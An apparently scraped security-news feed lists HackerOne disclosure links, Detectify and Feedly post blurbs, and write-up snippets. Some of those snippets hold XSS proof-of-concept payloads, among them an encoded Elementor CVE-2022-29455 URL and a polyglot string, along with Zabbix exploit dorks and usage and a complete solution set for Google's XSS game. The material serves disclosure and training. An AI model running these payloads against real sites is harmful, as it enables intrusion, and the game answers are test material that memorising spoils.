GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1690045 - Bounty: $1000 [Source]
GitHub Security Lab disclosed a bug submitted by smehta23: https://hackerone.com/reports/1678405 - Bounty: $1800 [Source]
Reddit disclosed a bug submitted by ahacker1: https://hackerone.com/reports/1656380 - Bounty: $1000 [Source]
Cloudflare Public Bug Bounty disclosed a bug submitted by ydvanjali: https://hackerone.com/reports/1664974 - Bounty: $250 [Source]
Informatica disclosed a bug submitted by isumitpatel: https://hackerone.com/reports/994612 [Source]
Nextcloud disclosed a bug submitted by bjoernv: https://hackerone.com/reports/1606961 - Bounty: $100 [Source]
TikTok disclosed a bug submitted by ckerha: https://hackerone.com/reports/1199965 - Bounty: $170 [Source]
Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1661113 - Bounty: $5000 [Source]
Reddit disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1285081 - Bounty: $200 [Source]
Reddit disclosed a bug submitted by heckintosh: https://hackerone.com/reports/1606957 - Bounty: $100 [Source]
Cloudflare Public Bug Bounty disclosed a bug submitted by lohigowda: https://hackerone.com/reports/1675730 - Bounty: $250 [Source]
Cloudflare Public Bug Bounty disclosed a bug submitted by path_network: https://hackerone.com/reports/1636320 - Bounty: $500 [Source]
Yelp disclosed a bug submitted by irfadps: https://hackerone.com/reports/1714970 [Source]
Flickr disclosed a bug submitted by stevejubs: https://hackerone.com/reports/1581258 - Bounty: $258 [Source]
Judge.me disclosed a bug submitted by penguinshelp: https://hackerone.com/reports/1595905 - Bounty: $500 [Source]
Node.js disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1632921 [Source]
Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1700276 - Bounty: $1125 [Source]
Slack disclosed a bug submitted by security_warrior: https://hackerone.com/reports/1661310 - Bounty: $250 [Source]
8x8 disclosed a bug submitted by rajauzairabdullah: https://hackerone.com/reports/790846 [Source]
Yelp disclosed a bug submitted by raja404: https://hackerone.com/reports/1712240 [Source]
Yelp disclosed a bug submitted by er_salil: https://hackerone.com/reports/1023773 [Source]
Yelp disclosed a bug submitted by qualwin3001: https://hackerone.com/reports/1707616 [Source]
Reddit disclosed a bug submitted by criptex: https://hackerone.com/reports/1051373 - Bounty: $5000 [Source]
U.S. Dept Of Defense disclosed a bug submitted by thpless: https://hackerone.com/reports/1624152 - Bounty: $500 [Source]
Adobe disclosed a bug submitted by gdattacker: https://hackerone.com/reports/1661914 [Source]
MTN Group disclosed a bug submitted by possowski: https://hackerone.com/reports/1646248 [Source]
Internet Bug Bounty disclosed a bug submitted by happyhacking123: https://hackerone.com/reports/1664019 - Bounty: $600 [Source]
Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1663788 - Bounty: $1200 [Source]
Have you ever wished Google Assistant could read you the articles in your Feedly? Now it can. Nick Felker has created a Google Assistant Action that integrates Google Assistant and Feedly. Thanks to the Feedly action, Google Assistant can list the headlines in your feeds, read specific articles, and even...
Easily track key business events like funding events, product launches, or partnerships. Industries are changing at a faster pace than ever. Keeping up with new threats and opportunities can be overwhelming and time-consuming. Today, we’re excited to announce a new Leo skill that lets you easily track key strategic moves...
We’re excited to launch a new version of the Feedly Web UI that improves the navigation and adds support for a cool dark theme. Here’s a quick demo of the new Feedly dark theme and left navigation bar updates: More visible Add Content (+) The profile and add content are...
The post New reward system to accelerate learning and growth on Detectify appeared first on Detectify Labs. [Source]
The post How To Hack Web Applications in 2022: Part 2 appeared first on Detectify Labs. [Source]
The post SSRF vulnerabilities and where to find them appeared first on Detectify Labs. [Source]
The post Module disclosures now available for hackers on Detectify Crowdsource appeared first on Detectify Labs. [Source]
The post Account hijacking using “dirty dancing” in sign-in OAuth-flows appeared first on Detectify Labs. [Source]
The post Common Security Vulnerabilities in Core AWS Services: Exploitation and Mitigation appeared first on Detectify Labs. [Source]
The post How to: Look for TLS private keys on Docker Hub appeared first on Detectify Labs. [Source]
The post Hack with ‘goodfaith’ – A tool to automate and scale good faith hacking appeared first on Detectify Labs. [Source]
The post Leveraging AWS QuickSight dashboards to visualize recon data appeared first on Detectify Labs. [Source]
The post How To Hack Web Applications in 2022: Part 1 appeared first on Detectify Labs. [Source]
The DOM-based Reflected Cross-Site Scripting (XSS) vulnerability affects Elementor's Elementor Website Builder plugin, versions <= 3.5.5, and is tracked as CVE-2022-29455. 4websecurity.com already reported the vulnerability to tens of thousands of websites that are running WordPress with this version of the plugin. References: https://nvd.nist.gov/vuln/detail/CVE-2022-29455 – https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor – https://www.rotem-bar.com/elementor. POC (Proof of Concept): the payload is Base64 encoded: https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0= Decoded from...
You must have heard about time travel in movies, series and comics. Well, here we are. Nah, I'm not joking: you can travel back in time and fetch the endpoints from web applications to do further exploitation. Don't believe me? xD You will after travelling with TheTimeMachine. PS: Doesn't...
In the case of instances where the SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor, because a user login stored in the session was not verified. Dork: shodan-query: http.favicon.hash:892542951 fofa-query: app="ZABBIX-监控系统" && body="saml" usage nuclei -l target.txt -tags zabbix python3 zabbix_session_exp.py -t https:target.com...
jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e [Source]
Improper Access Control to Remote Code Execution (CVE-2020-8591). In this post, I will explain how I hacked a whole system by exploiting an improper access control vulnerability in the popular Java-based MaaS software "eG Manager" and how I escalated it to execute code remotely. Impact: The Improper Access Control weakness...
Hi guys, this is Neil Harvey Miñano, a newbie security researcher from the Philippines. This is my 1st write-up, and also I am not good at XSS, so forgive all mistakes. It was 04/20/2021 and my 1st day of bug hunting. I'm still a newbie! Today I am gonna share a Reflected XSS vulnerability what...
Penetration testers mostly use these extensions to locate broken links and report them to the client; the extensions also help determine whether a target website contains vulnerabilities that could lead to exploitation and theft of sensitive information. Here are the different Chrome extensions that are...
https://xss-game.appspot.com/
Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
Hint: inspect the source code of the page
Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
Hint: the "welcome" post contains HTML
Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss
Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')...
Speaking with the team at Open Bug Bounty was the highlight of her day for Aviva Zacks of Safety Detectives. She learned that their community-driven spirit is exactly what advantageously differentiates their project from the others out there. https://www.safetydetectives.com/blog/interview-open-bug-bounty/ [Source]